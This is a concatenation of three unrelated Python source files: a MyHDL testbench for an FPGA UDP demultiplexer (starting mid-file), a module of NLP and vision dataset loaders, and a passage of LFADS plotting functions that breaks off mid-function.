m_udp_source_port_list = [m_udp_source_port((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_dest_port_list = [m_udp_dest_port((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_length_list = [m_udp_length((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_checksum_list = [m_udp_checksum((i+1)*16, i*16) for i in range(M_COUNT)]
m_udp_payload_axis_tdata_list = [m_udp_payload_axis_tdata((i+1)*DATA_WIDTH, i*DATA_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tkeep_list = [m_udp_payload_axis_tkeep((i+1)*KEEP_WIDTH, i*KEEP_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tvalid_list = [m_udp_payload_axis_tvalid(i) for i in range(M_COUNT)]
m_udp_payload_axis_tlast_list = [m_udp_payload_axis_tlast(i) for i in range(M_COUNT)]
m_udp_payload_axis_tid_list = [m_udp_payload_axis_tid((i+1)*ID_WIDTH, i*ID_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tdest_list = [m_udp_payload_axis_tdest((i+1)*DEST_WIDTH, i*DEST_WIDTH) for i in range(M_COUNT)]
m_udp_payload_axis_tuser_list = [m_udp_payload_axis_tuser((i+1)*USER_WIDTH, i*USER_WIDTH) for i in range(M_COUNT)]
# sources and sinks
source_pause = Signal(bool(0))
sink_pause_list = []
sink_list = []
sink_logic_list = []
source = udp_ep.UDPFrameSource()
source_logic = source.create_logic(
clk,
rst,
udp_hdr_ready=s_udp_hdr_ready,
udp_hdr_valid=s_udp_hdr_valid,
eth_dest_mac=s_eth_dest_mac,
eth_src_mac=s_eth_src_mac,
eth_type=s_eth_type,
ip_version=s_ip_version,
ip_ihl=s_ip_ihl,
ip_dscp=s_ip_dscp,
ip_ecn=s_ip_ecn,
ip_length=s_ip_length,
ip_identification=s_ip_identification,
ip_flags=s_ip_flags,
ip_fragment_offset=s_ip_fragment_offset,
ip_ttl=s_ip_ttl,
ip_protocol=s_ip_protocol,
ip_header_checksum=s_ip_header_checksum,
ip_source_ip=s_ip_source_ip,
ip_dest_ip=s_ip_dest_ip,
udp_source_port=s_udp_source_port,
udp_dest_port=s_udp_dest_port,
udp_length=s_udp_length,
udp_checksum=s_udp_checksum,
udp_payload_tdata=s_udp_payload_axis_tdata,
udp_payload_tkeep=s_udp_payload_axis_tkeep,
udp_payload_tvalid=s_udp_payload_axis_tvalid,
udp_payload_tready=s_udp_payload_axis_tready,
udp_payload_tlast=s_udp_payload_axis_tlast,
udp_payload_tuser=s_udp_payload_axis_tuser,
pause=source_pause,
name='source'
)
for k in range(M_COUNT):
s = udp_ep.UDPFrameSink()
p = Signal(bool(0))
sink_list.append(s)
sink_pause_list.append(p)
sink_logic_list.append(s.create_logic(
clk,
rst,
udp_hdr_ready=m_udp_hdr_ready_list[k],
udp_hdr_valid=m_udp_hdr_valid_list[k],
eth_dest_mac=m_eth_dest_mac_list[k],
eth_src_mac=m_eth_src_mac_list[k],
eth_type=m_eth_type_list[k],
ip_version=m_ip_version_list[k],
ip_ihl=m_ip_ihl_list[k],
ip_dscp=m_ip_dscp_list[k],
ip_ecn=m_ip_ecn_list[k],
ip_length=m_ip_length_list[k],
ip_identification=m_ip_identification_list[k],
ip_flags=m_ip_flags_list[k],
ip_fragment_offset=m_ip_fragment_offset_list[k],
ip_ttl=m_ip_ttl_list[k],
ip_protocol=m_ip_protocol_list[k],
ip_header_checksum=m_ip_header_checksum_list[k],
ip_source_ip=m_ip_source_ip_list[k],
ip_dest_ip=m_ip_dest_ip_list[k],
udp_source_port=m_udp_source_port_list[k],
udp_dest_port=m_udp_dest_port_list[k],
udp_length=m_udp_length_list[k],
udp_checksum=m_udp_checksum_list[k],
udp_payload_tdata=m_udp_payload_axis_tdata_list[k],
udp_payload_tkeep=m_udp_payload_axis_tkeep_list[k],
udp_payload_tvalid=m_udp_payload_axis_tvalid_list[k],
udp_payload_tready=m_udp_payload_axis_tready_list[k],
udp_payload_tlast=m_udp_payload_axis_tlast_list[k],
udp_payload_tuser=m_udp_payload_axis_tuser_list[k],
pause=p,
name='sink_%d' % k
))
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
s_udp_hdr_valid=s_udp_hdr_valid,
s_udp_hdr_ready=s_udp_hdr_ready,
s_eth_dest_mac=s_eth_dest_mac,
s_eth_src_mac=s_eth_src_mac,
s_eth_type=s_eth_type,
s_ip_version=s_ip_version,
s_ip_ihl=s_ip_ihl,
s_ip_dscp=s_ip_dscp,
s_ip_ecn=s_ip_ecn,
s_ip_length=s_ip_length,
s_ip_identification=s_ip_identification,
s_ip_flags=s_ip_flags,
s_ip_fragment_offset=s_ip_fragment_offset,
s_ip_ttl=s_ip_ttl,
s_ip_protocol=s_ip_protocol,
s_ip_header_checksum=s_ip_header_checksum,
s_ip_source_ip=s_ip_source_ip,
s_ip_dest_ip=s_ip_dest_ip,
s_udp_source_port=s_udp_source_port,
s_udp_dest_port=s_udp_dest_port,
s_udp_length=s_udp_length,
s_udp_checksum=s_udp_checksum,
s_udp_payload_axis_tdata=s_udp_payload_axis_tdata,
s_udp_payload_axis_tkeep=s_udp_payload_axis_tkeep,
s_udp_payload_axis_tvalid=s_udp_payload_axis_tvalid,
s_udp_payload_axis_tready=s_udp_payload_axis_tready,
s_udp_payload_axis_tlast=s_udp_payload_axis_tlast,
s_udp_payload_axis_tid=s_udp_payload_axis_tid,
s_udp_payload_axis_tdest=s_udp_payload_axis_tdest,
s_udp_payload_axis_tuser=s_udp_payload_axis_tuser,
m_udp_hdr_valid=m_udp_hdr_valid,
m_udp_hdr_ready=m_udp_hdr_ready,
m_eth_dest_mac=m_eth_dest_mac,
m_eth_src_mac=m_eth_src_mac,
m_eth_type=m_eth_type,
m_ip_version=m_ip_version,
m_ip_ihl=m_ip_ihl,
m_ip_dscp=m_ip_dscp,
m_ip_ecn=m_ip_ecn,
m_ip_length=m_ip_length,
m_ip_identification=m_ip_identification,
m_ip_flags=m_ip_flags,
m_ip_fragment_offset=m_ip_fragment_offset,
m_ip_ttl=m_ip_ttl,
m_ip_protocol=m_ip_protocol,
m_ip_header_checksum=m_ip_header_checksum,
m_ip_source_ip=m_ip_source_ip,
m_ip_dest_ip=m_ip_dest_ip,
m_udp_source_port=m_udp_source_port,
m_udp_dest_port=m_udp_dest_port,
m_udp_length=m_udp_length,
m_udp_checksum=m_udp_checksum,
m_udp_payload_axis_tdata=m_udp_payload_axis_tdata,
m_udp_payload_axis_tkeep=m_udp_payload_axis_tkeep,
m_udp_payload_axis_tvalid=m_udp_payload_axis_tvalid,
m_udp_payload_axis_tready=m_udp_payload_axis_tready,
m_udp_payload_axis_tlast=m_udp_payload_axis_tlast,
m_udp_payload_axis_tid=m_udp_payload_axis_tid,
m_udp_payload_axis_tdest=m_udp_payload_axis_tdest,
m_udp_payload_axis_tuser=m_udp_payload_axis_tuser,
enable=enable,
drop=drop,
select=select
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
yield clk.posedge
enable.next = True
yield clk.posedge
print("test 1: select port 0")
current_test.next = 1
select.next = 0
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame
yield delay(100)
yield clk.posedge
print("test 2: select port 1")
current_test.next = 2
select.next = 1
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame
yield delay(100)
yield clk.posedge
print("test 3: back-to-back packets, same port")
current_test.next = 3
select.next = 0
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame1
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 4: back-to-back packets, different ports")
current_test.next = 4
select.next = 1
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield clk.posedge
while s_udp_payload_axis_tvalid or s_udp_hdr_valid:
yield clk.posedge
select.next = 2
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame1
yield sink_list[2].wait()
rx_frame = sink_list[2].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 5: alterate pause source")
current_test.next = 5
select.next = 1
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield clk.posedge
while s_udp_payload_axis_tvalid or s_udp_hdr_valid:
source_pause.next = True
yield clk.posedge
yield clk.posedge
yield clk.posedge
source_pause.next = False
yield clk.posedge
select.next = 2
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame1
yield sink_list[2].wait()
rx_frame = sink_list[2].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 6: alterate pause sink")
current_test.next = 6
select.next = 1
test_frame1 = udp_ep.UDPFrame()
test_frame1.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame1.eth_src_mac = 0x5A5152535455
test_frame1.eth_type = 0x8000
test_frame1.ip_version = 4
test_frame1.ip_ihl = 5
test_frame1.ip_dscp = 0
test_frame1.ip_ecn = 0
test_frame1.ip_length = None
test_frame1.ip_identification = 0
test_frame1.ip_flags = 2
test_frame1.ip_fragment_offset = 0
test_frame1.ip_ttl = 64
test_frame1.ip_protocol = 0x11
test_frame1.ip_header_checksum = None
test_frame1.ip_source_ip = 0xc0a80165
test_frame1.ip_dest_ip = 0xc0a80164
test_frame1.udp_source_port = 1
test_frame1.udp_dest_port = 2
test_frame1.udp_length = None
test_frame1.udp_checksum = None
test_frame1.payload = bytearray(range(32))
test_frame1.build()
test_frame2 = udp_ep.UDPFrame()
test_frame2.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame2.eth_src_mac = 0x5A5152535455
test_frame2.eth_type = 0x8000
test_frame2.ip_version = 4
test_frame2.ip_ihl = 5
test_frame2.ip_dscp = 0
test_frame2.ip_ecn = 0
test_frame2.ip_length = None
test_frame2.ip_identification = 0
test_frame2.ip_flags = 2
test_frame2.ip_fragment_offset = 0
test_frame2.ip_ttl = 64
test_frame2.ip_protocol = 0x11
test_frame2.ip_header_checksum = None
test_frame2.ip_source_ip = 0xc0a80165
test_frame2.ip_dest_ip = 0xc0a80164
test_frame2.udp_source_port = 1
test_frame2.udp_dest_port = 2
test_frame2.udp_length = None
test_frame2.udp_checksum = None
test_frame2.payload = bytearray(range(32))
test_frame2.build()
source.send(test_frame1)
source.send(test_frame2)
yield clk.posedge
while s_udp_payload_axis_tvalid or s_udp_hdr_valid:
for k in range(M_COUNT):
sink_pause_list[k].next = False
yield clk.posedge
yield clk.posedge
yield clk.posedge
for k in range(M_COUNT):
sink_pause_list[k].next = False
yield clk.posedge
select.next = 2
yield sink_list[1].wait()
rx_frame = sink_list[1].recv()
assert rx_frame == test_frame1
yield sink_list[2].wait()
rx_frame = sink_list[2].recv()
assert rx_frame == test_frame2
yield delay(100)
yield clk.posedge
print("test 7: enable")
current_test.next = 7
enable.next = False
select.next = 0
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield delay(500)
assert sink_list[0].empty()
enable.next = True
yield sink_list[0].wait()
rx_frame = sink_list[0].recv()
assert rx_frame == test_frame
yield delay(100)
yield clk.posedge
print("test 8: drop")
current_test.next = 8
drop.next = True
select.next = 0
test_frame = udp_ep.UDPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x8000
test_frame.ip_version = 4
test_frame.ip_ihl = 5
test_frame.ip_dscp = 0
test_frame.ip_ecn = 0
test_frame.ip_length = None
test_frame.ip_identification = 0
test_frame.ip_flags = 2
test_frame.ip_fragment_offset = 0
test_frame.ip_ttl = 64
test_frame.ip_protocol = 0x11
test_frame.ip_header_checksum = None
test_frame.ip_source_ip = 0xc0a80165
test_frame.ip_dest_ip = 0xc0a80164
test_frame.udp_source_port = 1
test_frame.udp_dest_port = 2
test_frame.udp_length = None
test_frame.udp_checksum = None
test_frame.payload = bytearray(range(32))
test_frame.build()
source.send(test_frame)
yield delay(500)
assert sink_list[0].empty()
drop.next = False
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
os.chdir(os.path.dirname(os.path.abspath(__file__)))
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
|
|
import random # pragma: no cover
import io # pragma: no cover
from collections import Counter # pragma: no cover
import os.path # pragma: no cover
import csv # pragma: no cover
import numpy
from pathlib import Path
import json
from ._vendorized.keras_data_utils import get_file # pragma: no cover
from ..neural.util import partition
from ..neural.util import to_categorical
try:
basestring
except NameError:
basestring = str
GITHUB = 'https://github.com/UniversalDependencies/' # pragma: no cover
ANCORA_1_4_ZIP = '{github}/{ancora}/archive/r1.4.zip'.format(
github=GITHUB, ancora='UD_Spanish-AnCora') # pragma: no cover
EWTB_1_4_ZIP = '{github}/{ewtb}/archive/r1.4.zip'.format(
github=GITHUB, ewtb='UD_English') # pragma: no cover
SNLI_URL = 'http://nlp.stanford.edu/projects/snli/snli_1.0.zip'
QUORA_QUESTIONS_URL = 'http://qim.ec.quoracdn.net/quora_duplicate_questions.tsv'
IMDB_URL = 'http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz'
def ancora_pos_tags(encode_words=False): # pragma: no cover
data_dir = get_file('UD_Spanish-AnCora-r1.4', ANCORA_1_4_ZIP,
unzip=True)
train_loc = os.path.join(data_dir, 'es_ancora-ud-train.conllu')
dev_loc = os.path.join(data_dir, 'es_ancora-ud-dev.conllu')
return ud_pos_tags(train_loc, dev_loc, encode_words=encode_words)
def ewtb_pos_tags(encode_tags=False, encode_words=False): # pragma: no cover
data_dir = get_file('UD_English-r1.4', EWTB_1_4_ZIP, unzip=True)
train_loc = os.path.join(data_dir, 'en-ud-train.conllu')
dev_loc = os.path.join(data_dir, 'en-ud-dev.conllu')
return ud_pos_tags(train_loc, dev_loc,
encode_tags=encode_tags, encode_words=encode_words)
def ud_pos_tags(train_loc, dev_loc, encode_tags=True, encode_words=True): # pragma: no cover
train_sents = list(read_conll(train_loc))
dev_sents = list(read_conll(dev_loc))
tagmap = {}
freqs = Counter()
for words, tags in train_sents:
for tag in tags:
tagmap.setdefault(tag, len(tagmap))
for word in words:
freqs[word] += 1
vocab = {word: i for i, (word, freq) in enumerate(freqs.most_common())
if (freq >= 5)}
def _encode(sents):
X = []
y = []
for words, tags in sents:
if encode_words:
X.append(
numpy.asarray(
[vocab.get(word, len(vocab)) for word in words],
dtype='uint64'))
else:
X.append(words)
if encode_tags:
y.append(numpy.asarray(
[tagmap[tag] for tag in tags],
dtype='int32'))
else:
y.append(tags)
return zip(X, y)
return _encode(train_sents), _encode(dev_sents), len(tagmap)
def imdb(loc=None, limit=0):
if loc is None:
loc = get_file('aclImdb', IMDB_URL, untar=True, unzip=True)
train_loc = Path(loc) / 'train'
test_loc = Path(loc) / 'test'
return read_imdb(train_loc, limit=limit), read_imdb(test_loc, limit=limit)
def read_wikiner(file_, tagmap=None):
Xs = []
ys = []
for line in file_:
if not line.strip():
continue
tokens = [t.rsplit('|', 2) for t in line.split()]
words, _, tags = zip(*tokens)
if tagmap is not None:
tags = [tagmap.setdefault(tag, len(tagmap)) for tag in tags]
Xs.append(words)
ys.append(tags)
return zip(Xs, ys)
def read_imdb(data_dir, limit=0):
examples = []
for subdir, label in (('pos', 1), ('neg', 0)):
for filename in (data_dir / subdir).iterdir():
with filename.open('r', encoding='utf8') as file_:
text = file_.read()
text = text.replace('<br />', '\n\n')
if text.strip():
examples.append((text, label))
random.shuffle(examples)
if limit >= 1:
examples = examples[:limit]
return examples
def read_conll(loc): # pragma: no cover
n = 0
with io.open(loc, encoding='utf8') as file_:
sent_strs = file_.read().strip().split('\n\n')
for sent_str in sent_strs:
lines = [line.split() for line in sent_str.split('\n')
if not line.startswith('#')]
words = []
tags = []
for i, pieces in enumerate(lines):
if len(pieces) == 4:
word, pos, head, label = pieces
else:
idx, word, lemma, pos1, pos, morph, head, label, _, _2 = pieces
if '-' in idx:
continue
words.append(word)
tags.append(pos)
yield words, tags
def read_csv(csv_loc, label_col=0, text_col=-1):
with csv_loc.open() as file_:
for row in csv.reader(file_):
label_str = row[label_col]
text = row[text_col]
yield text, label_str
def mnist(): # pragma: no cover
from ._vendorized.keras_datasets import load_mnist
# the data, shuffled and split between tran and test sets
(X_train, y_train), (X_test, y_test) = load_mnist()
X_train = X_train.reshape(60000, 784)
X_test = X_test.reshape(10000, 784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255.
X_test /= 255.
train_data = list(zip(X_train, y_train))
nr_train = X_train.shape[0]
random.shuffle(train_data)
heldout_data = train_data[:int(nr_train * 0.1)]
train_data = train_data[len(heldout_data):]
test_data = list(zip(X_test, y_test))
return train_data, heldout_data, test_data
def reuters(): # pragma: no cover
from ._vendorized.keras_datasets import load_reuters
(X_train, y_train), (X_test, y_test) = load_reuters()
return (X_train, y_train), (X_test, y_test)
def quora_questions(loc=None):
if loc is None:
loc = get_file('quora_similarity.tsv', QUORA_QUESTIONS_URL)
if isinstance(loc, basestring):
loc = Path(loc)
is_header = True
lines = []
with loc.open('r', encoding='utf8') as file_:
for row in csv.reader(file_, delimiter='\t'):
if is_header:
is_header = False
continue
id_, qid1, qid2, sent1, sent2, is_duplicate = row
sent1 = sent1.decode('utf8').strip()
sent2 = sent2.decode('utf8').strip()
if sent1 and sent2:
lines.append(((sent1, sent2), int(is_duplicate)))
train, dev = partition(lines, 0.9)
return train, dev
THREE_LABELS = {'entailment': 2, 'contradiction': 1, 'neutral': 0}
TWO_LABELS = {'entailment': 1, 'contradiction': 0, 'neutral': 0}
def snli(loc=None, ternary=False):
label_scheme = THREE_LABELS if ternary else TWO_LABELS
if loc is None:
loc = get_file('snli_1.0', SNLI_URL, unzip=True)
if isinstance(loc, basestring):
loc = Path(loc)
train = read_snli(Path(loc) / 'snli_1.0_train.jsonl', label_scheme)
dev = read_snli(Path(loc) / 'snli_1.0_dev.jsonl', label_scheme)
return train, dev
def stack_exchange(loc=None):
if loc is None:
raise ValueError("No default path for Stack Exchange yet")
rows = []
with loc.open('r', encoding='utf8') as file_:
for line in file_:
eg = json.loads(line)
rows.append(((eg['text1'], eg['text2']), int(eg['label'])))
train, dev = partition(rows, 0.7)
return train, dev
def read_snli(loc, label_scheme):
rows = []
with loc.open('r', encoding='utf8') as file_:
for line in file_:
eg = json.loads(line)
label = eg['gold_label']
if label == '-':
continue
rows.append(((eg['sentence1'], eg['sentence2']), label_scheme[label]))
return rows
def get_word_index(path='reuters_word_index.pkl'): # pragma: no cover
path = get_file(path, origin='https://s3.amazonaws.com/text-datasets/reuters_word_index.pkl')
f = open(path, 'rb')
if sys.version_info < (3,):
data = cPickle.load(f)
else:
data = cPickle.load(f, encoding='latin1')
f.close()
return data
|
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Plotting functions for LFADS and the data RNN example."""
from __future__ import print_function, division, absolute_import
import matplotlib.pyplot as plt
import numpy as onp
from scipy import stats
from sklearn.decomposition import PCA
def plot_data_pca(data_dict):
"""Plot the PCA skree plot of the hidden units in the integrator RNN."""
f = plt.figure()
ndata, ntime, nhidden = data_dict['hiddens'].shape
print('Number of data examples: ', ndata)
print('Number of timesteps: ', ntime)
print('Number of data dimensions: ', nhidden)
pca = PCA(n_components=100)
pca.fit(onp.reshape(data_dict['hiddens'], [ndata * ntime, nhidden]))
plt.plot(onp.arange(1, 16), onp.cumsum(pca.explained_variance_ratio_)[0:15],
'-o');
plt.plot([1, 15], [0.95, 0.95])
plt.xlabel('PC #')
plt.ylabel('Cumulative Variance')
plt.xlim([1, 15])
plt.ylim([0.3, 1]);
return f
def plot_data_example(input_bxtxu, hidden_bxtxn=None,
output_bxtxo=None, target_bxtxo=None, bidx=None):
"""Plot a single example of the data from the data integrator RNN."""
if bidx is None:
bidx = onp.random.randint(0, input_bxtxu.shape[0])
ntoplot = 10
ntimesteps = input_bxtxu.shape[1]
f = plt.figure(figsize=(10,8))
plt.subplot(311)
plt.plot(input_bxtxu[bidx,:,0])
plt.xlim([0, ntimesteps-1])
plt.ylabel('Input')
plt.title('Example %d'%bidx)
if hidden_bxtxn is not None:
plt.subplot(312)
plt.plot(hidden_bxtxn[bidx, :, 0:ntoplot] + 0.25*onp.arange(0, ntoplot, 1), 'b')
plt.ylabel('Hiddens')
plt.xlim([0, ntimesteps-1]);
plt.subplot(414)
if output_bxtxo is not None:
plt.plot(output_bxtxo[bidx,:,0].T, 'r');
plt.xlim([0, ntimesteps-1]);
plt.ylabel('Output / Targets')
plt.xlabel('Time')
if target_bxtxo is not None:
plt.plot(target_bxtxo[bidx,:,0], 'k');
plt.xlim([0, ntimesteps-1]);
return f
def plot_data_stats(data_dict, data_bxtxn, data_dt):
"""Plot the statistics of the data integrator RNN data after spikifying."""
print(onp.mean(onp.sum(data_bxtxn, axis=1)), "spikes/second")
f = plt.figure(figsize=(12,4))
plt.subplot(141)
plt.hist(onp.mean(data_bxtxn, axis=1).ravel()/data_dt);
plt.xlabel('spikes / sec')
plt.subplot(142)
plt.imshow(data_dict['hiddens'][0,:,:].T)
plt.xlabel('time')
plt.ylabel('neuron #')
plt.title('Sample trial rates')
plt.subplot(143);
plt.imshow(data_bxtxn[0,:,:].T)
plt.xlabel('time')
plt.ylabel('neuron #')
plt.title('spikes')
plt.subplot(144)
plt.stem(onp.mean(onp.sum(data_bxtxn, axis=1), axis=0));
plt.xlabel('neuron #')
plt.ylabel('spikes / sec');
return f
def plot_losses(tlosses, elosses, sampled_every):
"""Plot the losses associated with training LFADS."""
f = plt.figure(figsize=(15, 12))
for lidx, k in enumerate(tlosses):
plt.subplot(3, 2, lidx+1)
tl = tlosses[k].shape[0]
x = onp.arange(0, tl) * sampled_every
plt.plot(x, tlosses[k], 'k')
plt.plot(x, elosses[k], 'r')
plt.axis('tight')
plt.title(k)
return f
def plot_priors(params):
"""Plot the parameters of the LFADS priors."""
prior_dicts = {'ic' : params['ic_prior'], 'ii' : params['ii_prior']}
pidxs = (pidx for pidx in onp.arange(1,12))
